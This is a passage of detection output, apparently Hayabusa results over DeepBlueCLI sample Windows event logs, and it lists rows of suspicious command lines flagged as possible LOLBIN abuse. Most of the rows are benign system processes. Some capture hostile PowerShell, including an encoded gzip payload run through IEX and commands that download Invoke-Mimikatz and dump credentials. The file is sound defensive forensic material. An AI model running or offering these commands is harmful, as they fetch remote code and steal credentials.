IO.MemoryStream(,[Convert]::FromBase64String('H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA=='));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 06:32:11.794 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfb0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 06:32:11.932 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2a8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 06:32:15.491 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xb54 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 07:03:41.021 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7a4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 07:04:04.853 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 07:05:07.184 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x638 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 07:05:22.839 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x794 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 07:38:23.648 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x790 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:21:28.626 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x628 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:21:32.207 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:21:32.340 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdec | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:21:38.772 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x42c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:21:41.273 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf8c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:21:41.456 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf68 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:21:52.074 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ri1rh0d1.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xb9c | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:29:34.138 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x674 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:29:34.389 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x31c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:29:35.564 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\nkjhcxgj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xfa0 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:36:49.583 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb80 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:36:49.699 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfec | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:36:50.791 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\gajrh2ob.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xcbc | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:00:02.041 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x430 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4b8 | User: IEUser | LID: 0x6593d",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:11:45.826 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd50 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:11:45.870 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd70 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x62c | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9a4 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb80 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdb8 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 10:00:00.931 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xd78 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 10:28:55.331 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x300 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 10:28:55.343 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x59c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 12:38:31.558 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc30 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 12:38:32.423 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x304 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 12:38:32.538 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x370 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 12:38:43.023 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 12:44:04.646 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x380 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 12:44:04.653 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x7dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 21:48:41.680 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x23c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 21:48:42.006 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9d4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 21:48:42.440 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160920124842.log C:\Windows\Logs\CBS\CbsPersist_20160920124842.cab | Path: C:\Windows\System32\makecab.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 21:48:42.724 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 21:48:46.672 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x718 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 21:48:54.436 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 22:07:13.234 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 22:07:23.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 22:07:41.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
